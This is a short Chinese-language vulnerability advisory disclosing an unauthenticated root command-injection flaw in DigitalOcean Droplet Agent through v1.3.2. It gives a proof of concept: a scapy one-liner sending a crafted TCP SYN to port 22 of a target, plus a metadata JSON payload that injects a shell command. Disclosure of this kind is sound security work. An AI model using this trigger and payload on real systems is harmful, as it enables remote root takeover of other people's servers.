DigitalOcean Droplet Agent 至 v1.3.2 版本中存在严重的前认证 Root RCE(CVSS 10.0)漏洞,可通过命令注入实现。
在 DigitalOcean Droplet Agent(所有版本,包括 1.3.2)中发现了一个严重的命令注入漏洞。该漏洞允许攻击者在无需任何认证的情况下实现具有 root 权限的远程代码执行(RCE)。
发现者: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
该漏洞存在于故障排除执行器组件中:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.go该代理会处理来自本地服务(169.254.169.254)的元数据,并在未进行适当清理的情况下执行 TroubleshootingAgent.Requesting 数组中的命令。
该代理通过发送到端口 22 的特定 TCP 数据包触发:
触发获取:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
恶意元数据载荷:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
影响 CVSS 评分:10.0(严重)
所需权限:无
结果:完全系统沦陷(Root 访问权限)
